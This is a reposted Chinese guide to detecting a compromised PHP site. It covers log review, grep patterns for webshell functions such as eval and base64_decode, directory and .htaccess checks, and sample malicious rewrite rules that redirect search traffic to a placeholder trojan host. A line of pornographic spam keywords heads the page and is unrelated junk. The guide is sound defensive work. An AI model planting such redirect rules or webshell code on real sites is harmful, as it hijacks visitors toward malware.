一级毛片免费不卡在线视频,国产日批视频免费在线观看,菠萝菠萝蜜在线视频免费视频,欧美日韩亚洲无线码在线观看,久久精品这里精品,国产成人综合手机在线播放,色噜噜狠狠狠综合曰曰曰,琪琪视频

檢測(cè)php網(wǎng)站是否已經(jīng)被攻破的方法WEB安全 -電腦資料

電腦資料 時(shí)間:2019-01-01 我要投稿
【www.oriental01.com - 電腦資料】

   

    from :http://www.gregfreeman.org/2013/how-to-tell-if-your-php-site-has-been-compromised/

0x01 查看訪問(wèn)日志


    看是否有文件上傳操作(POST方法),

<code style="padding: 0px; font-family: Monaco, Menlo, Consolas, 'Courier New', monospace; color: inherit; border-top-left-radius: 3px; border-top-right-radius: 3px; border-bottom-right-radius: 3px; border-bottom-left-radius: 3px; background-color: transparent; border: 0px;">IPREMOVED - - [01/Mar/2013:06:16:48 -0600] "POST/uploads/monthly_10_2012/view.php HTTP/1.1" 200 36 "-" "Mozilla/5.0" IPREMOVED - - [01/Mar/2013:06:12:58 -0600] "POST/public/style_images/master/profile/blog.php HTTP/1.1" 200 36 "-" "Mozilla/5.0"</code>

    nginx默認(rèn)記錄的日志格式為:

<code style="padding: 0px; font-family: Monaco, Menlo, Consolas, 'Courier New', monospace; color: inherit; border-top-left-radius: 3px; border-top-right-radius: 3px; border-bottom-right-radius: 3px; border-bottom-left-radius: 3px; background-color: transparent; border: 0px;">access_log logs/access.<span>log</span></code>

    或

<code style="padding: 0px; font-family: Monaco, Menlo, Consolas, 'Courier New', monospace; color: inherit; border-top-left-radius: 3px; border-top-right-radius: 3px; border-bottom-right-radius: 3px; border-bottom-left-radius: 3px; background-color: transparent; border: 0px;">access_log logs/access.<span>log</span>combined;</code>

    nginx默認(rèn)記錄日志的位置為:

<code style="padding: 0px; font-family: Monaco, Menlo, Consolas, 'Courier New', monospace; color: inherit; border-top-left-radius: 3px; border-top-right-radius: 3px; border-bottom-right-radius: 3px; border-bottom-left-radius: 3px; background-color: transparent; border: 0px;">nginx安裝目錄/<span>log</span>/</code>

0x02 查找含有惡意php代碼的文件


    2.1 查找最近發(fā)生變化的php文件

<code style="padding: 0px; font-family: Monaco, Menlo, Consolas, 'Courier New', monospace; color: inherit; border-top-left-radius: 3px; border-top-right-radius: 3px; border-bottom-right-radius: 3px; border-bottom-left-radius: 3px; background-color: transparent; border: 0px;">find . -type f -name '*.php' -mtime -7</code>

    -type f 表示搜索正常的一般文件 -mtime -7 表示7*24小時(shí)內(nèi)修改的文件

    結(jié)果可能如下:

<code style="padding: 0px; font-family: Monaco, Menlo, Consolas, 'Courier New', monospace; color: inherit; border-top-left-radius: 3px; border-top-right-radius: 3px; border-bottom-right-radius: 3px; border-bottom-left-radius: 3px; background-color: transparent; border: 0px;">.<span>/uploads/monthly</span>_04_2008/index.php .<span>/uploads/monthly</span>_10_2008/index.php .<span>/uploads/monthly</span>_08_2009/template.php .<span>/uploads/monthly</span>_02_2013/index.php</code>

    2.2 查找文件中是否存在疑似代碼

<code style="padding: 0px; font-family: Monaco, Menlo, Consolas, 'Courier New', monospace; color: inherit; border-top-left-radius: 3px; border-top-right-radius: 3px; border-bottom-right-radius: 3px; border-bottom-left-radius: 3px; background-color: transparent; border: 0px;">find . -type f -name<span>'*.php'</span>| xargs<span>grep</span>-l<span>"eval<span>*(</span>"</span>--color</code>

    (*代表任意個(gè)空格)

<code style="padding: 0px; font-family: Monaco, Menlo, Consolas, 'Courier New', monospace; color: inherit; border-top-left-radius: 3px; border-top-right-radius: 3px; border-bottom-right-radius: 3px; border-bottom-left-radius: 3px; background-color: transparent; border: 0px;">find . -type f -name<span>'*.php'</span>| xargs<span>grep</span>-l<span>"base64_decode<span>*(</span>"</span>--color find . -type f -name<span>'*.php'</span>| xargs<span>grep</span>-l<span>"gzinflate<span>*(</span>"</span>--color find . -type f -name<span>'*.php'</span>| xargs<span>grep</span>-l<span>"eval<span>*(</span>str_rot13<span>*(</span>base64_decode<span>*(</span>"</span>--color</code>

    注解:很多命令不支持管道傳遞參數(shù),而實(shí)際上又需要這樣,所以就用了xargs命令,這個(gè)命令可以用來(lái)管道傳遞參數(shù);grep -l表示只包含某個(gè)字符串的文件名,如果去掉-l則會(huì)顯示匹配特定字符串的行內(nèi)容

    幾個(gè)特殊字符串的意義: eval()把字符串按照php代碼來(lái)執(zhí)行,是最常見(jiàn)的php一句話木馬

    base64_decode() 將字符串base64解碼,攻擊的時(shí)候payload是base64編碼,則這個(gè)函數(shù)就有用武之地了

    gzinflate() 將字符串解壓縮處理,攻擊的時(shí)候payload用gzdeflate壓縮之后,使用這個(gè)函數(shù)進(jìn)行解壓縮

    str_rot13() 對(duì)字符串進(jìn)行rot13編碼

    也可以使用正則表達(dá)式來(lái)搜索文件,查找可以代碼:

<code style="padding: 0px; font-family: Monaco, Menlo, Consolas, 'Courier New', monospace; color: inherit; border-top-left-radius: 3px; border-top-right-radius: 3px; border-bottom-right-radius: 3px; border-bottom-left-radius: 3px; background-color: transparent; border: 0px;">find . -type f -name<span>'*.php'</span>| xargs egrep -i<span>"(mail|fsockopen|pfsockopen|stream\_socket\_client|exec|system|passthru|eval|base64_decode)<span>*(</span>"</span></code>

    下面解釋webshell常用的函數(shù):

    mail():可用來(lái)向網(wǎng)站用戶(hù)發(fā)送垃圾郵件

    fsockopen():打開(kāi)一個(gè)網(wǎng)絡(luò)連接或者一個(gè)unix套接字連接,可用于payload發(fā)送遠(yuǎn)程請(qǐng)求

    pfsockopen():和fsockopen()作用類(lèi)似

    stream_socket_client():建立一個(gè)遠(yuǎn)程連接,例子如下:

<code style="padding: 0px; font-family: Monaco, Menlo, Consolas, 'Courier New', monospace; color: inherit; border-top-left-radius: 3px; border-top-right-radius: 3px; border-bottom-right-radius: 3px; border-bottom-left-radius: 3px; background-color: transparent; border: 0px;"><span><?php</span><span>$fp</span>= stream_socket_client(<span>"tcp://www.example.com:80"</span>,<span>$errno</span>,<span>$errstr</span>,<span>30</span>);<span>if</span>(!<span>$fp</span>) {<span></span><span>echo</span><span>"$errstr ($errno)<br />\n"</span>;   }<span>else</span>{<span></span>fwrite(<span>$fp</span>,<span>"GET / HTTP/1.0\r\nHost: www.example.com\r\nAccept: */*\r\n\r\n"</span>);<span></span><span>while</span>(!feof(<span>$fp</span>)) {<span></span><span></span><span>echo</span>fgets(<span>$fp</span>,<span>1024</span>);<span></span>}<span></span>fclose(<span>$fp</span>);   }<span>?></span></code>

    exec():命令執(zhí)行函數(shù)

    system():同exec()

    passthru():同exec()

    preg_replace()正則表達(dá)式由修飾符"e"修飾的時(shí)候,替換字符串在替換之前需要按照php代碼執(zhí)行,這種情況也需要考慮到,這種情況可采用這種以下掃搜:

<code style="padding: 0px; font-family: Monaco, Menlo, Consolas, 'Courier New', monospace; color: inherit; border-top-left-radius: 3px; border-top-right-radius: 3px; border-bottom-right-radius: 3px; border-bottom-left-radius: 3px; background-color: transparent; border: 0px;">find . -type f -name<span>'*.php'</span>| xargs egrep -i<span>"preg_replace<span>*\</span>((['|\"])(.).<span>*\</span>2[a-z]<span>*e</span>[^\1]<span>*\</span>1<span>*,</span>"</span>--color</code>

0x03 比較代碼文件


    這種情況需要有一份干凈的代碼,這份代碼和正在使用的代碼進(jìn)行比較,

檢測(cè)php網(wǎng)站是否已經(jīng)被攻破的方法WEB安全

,

電腦資料

檢測(cè)php網(wǎng)站是否已經(jīng)被攻破的方法WEB安全》(http://www.oriental01.com)。例如

<code style="padding: 0px; font-family: Monaco, Menlo, Consolas, 'Courier New', monospace; color: inherit; border-top-left-radius: 3px; border-top-right-radius: 3px; border-bottom-right-radius: 3px; border-bottom-left-radius: 3px; background-color: transparent; border: 0px;">diff -r wordpress-clean/ wordpress-compromised/ -x wp-content</code>

    上面的例子是比較wordpress-clean/ 和wordpress-comprised/兩個(gè)目錄,并且目錄里面的wp-content/子目錄不比較

0x04 搜尋可寫(xiě)的目錄


看這個(gè)目錄里面是否有可疑文件,如下腳本查找權(quán)限為777的目錄是否存在php文件

search_dir=<span>$(</span>pwd)writable_dirs=<span>$(</span>find<span>$search_dir</span>-type d -perm<span>0777</span>)<span>for</span>dir<span>in</span><span>$writable_dirs</span><span>do</span><span>#echo $dir</span>find<span>$dir</span>-type f -name<span>'*.php'</span>done

    經(jīng)常在jpg文件中插入php代碼,因此在查詢(xún)這些目錄的時(shí)候也要查詢(xún)jpg文件:

<code style="padding: 0px; font-family: Monaco, Menlo, Consolas, 'Courier New', monospace; color: inherit; border-top-left-radius: 3px; border-top-right-radius: 3px; border-bottom-right-radius: 3px; border-bottom-left-radius: 3px; background-color: transparent; border: 0px;">find wp-content/uploads -type f -iname<span>'*.jpg'</span>| xargs<span>grep</span>-i php</code>

    注意:-iname 表示文件名不區(qū)分大小寫(xiě)  grep -i 也表示不區(qū)分大小寫(xiě)

0x05 檢測(cè)iframe標(biāo)簽


    經(jīng)常做的是嵌入iframe標(biāo)簽,因此可以查看網(wǎng)頁(yè)的源代碼,并且搜索其中是否存在iframe標(biāo)簽,可使用如下命令:

<code style="padding: 0px; font-family: Monaco, Menlo, Consolas, 'Courier New', monospace; color: inherit; border-top-left-radius: 3px; border-top-right-radius: 3px; border-bottom-right-radius: 3px; border-bottom-left-radius: 3px; background-color: transparent; border: 0px;">grep -i '<span><<span>iframe'</span><span>mywebsite.txt</span></span></code>

    對(duì)于動(dòng)態(tài)生成的頁(yè)面,可使用ff的 Live HTTP Headers 插件,下載到源碼之后再查找是否存在iframe標(biāo)簽

0x06 查找數(shù)據(jù)庫(kù)中是否存在敏感字符串


    包括%base64_%、%eval(%<等上面提到的一些關(guān)鍵詞

0x07 檢查.htaccess文件


    是否包含了auto_prepend_file和auto_append_file,使用如下命令

<code style="padding: 0px; font-family: Monaco, Menlo, Consolas, 'Courier New', monospace; color: inherit; border-top-left-radius: 3px; border-top-right-radius: 3px; border-bottom-right-radius: 3px; border-bottom-left-radius: 3px; background-color: transparent; border: 0px;">find . -type f -name<span>'\.htaccess'</span>| xargs<span>grep</span>-i auto_prepend_file find . -type f -name<span>'\.htaccess'</span>| xargs<span>grep</span>-i auto_append_file</code>

    auto_prepend_file的作用是加載當(dāng)前腳本文件之前,先加載的php腳本 auto_append_file的作用是加載當(dāng)前腳本文件之后,再加載的php腳本。 如果這么修改了.htaccess文件,那么可以在訪問(wèn).htaccess目錄的php腳本時(shí),加載上自己想要加載的惡意腳本 .

    htaccess文件還可以被用來(lái)把訪問(wèn)網(wǎng)站的流量劫持到 的網(wǎng)站,

<code style="padding: 0px; font-family: Monaco, Menlo, Consolas, 'Courier New', monospace; color: inherit; border-top-left-radius: 3px; border-top-right-radius: 3px; border-bottom-right-radius: 3px; border-bottom-left-radius: 3px; background-color: transparent; border: 0px;"><span>RewriteCond</span><span>%{HTTP_USER_AGENT}</span>^.*<span>Baiduspider</span>.*<span>$</span><span>Rewriterule</span>^(.*)<span>$</span><span>http:</span>/<span>/www.hacker.com/muma</span>.php [<span>R</span>=<span>301</span>]</code>

    將baidu爬蟲(chóng)的訪問(wèn)重定向到 的網(wǎng)站(包含HTTP_USER_AGENT和http關(guān)鍵字)

<code style="padding: 0px; font-family: Monaco, Menlo, Consolas, 'Courier New', monospace; color: inherit; border-top-left-radius: 3px; border-top-right-radius: 3px; border-bottom-right-radius: 3px; border-bottom-left-radius: 3px; background-color: transparent; border: 0px;"><span>RewriteCond</span><span>%{HTTP_REFERER}</span>^.*baidu.com.*<span>$</span><span>Rewriterule</span>^(.*)<span>$</span><span>http:</span>/<span>/www.hacker.com/muma</span>.php [<span>R</span>=<span>301</span>]</code>

    將來(lái)自baidu搜索引擎的流量重定向到 的網(wǎng)站(包含HTTP_REFERER和http關(guān)鍵字) 為了查看網(wǎng)站是否被.htaccess修改導(dǎo)致流量劫持,可以在搜索.htaccess文件的時(shí)候采用如下命令:

<code style="padding: 0px; font-family: Monaco, Menlo, Consolas, 'Courier New', monospace; color: inherit; border-top-left-radius: 3px; border-top-right-radius: 3px; border-bottom-right-radius: 3px; border-bottom-left-radius: 3px; background-color: transparent; border: 0px;">find . -type f -name<span>'\.htaccess'</span>| xargs<span>grep</span>-i http; find . -type f -name<span>'\.htaccess'</span>| xargs<span>grep</span>-i HTTP_USER_AGENT;  find . -type f -name<span>'\.htaccess'</span>| xargs<span>grep</span>-i HTTP_REFERER</code>

最新文章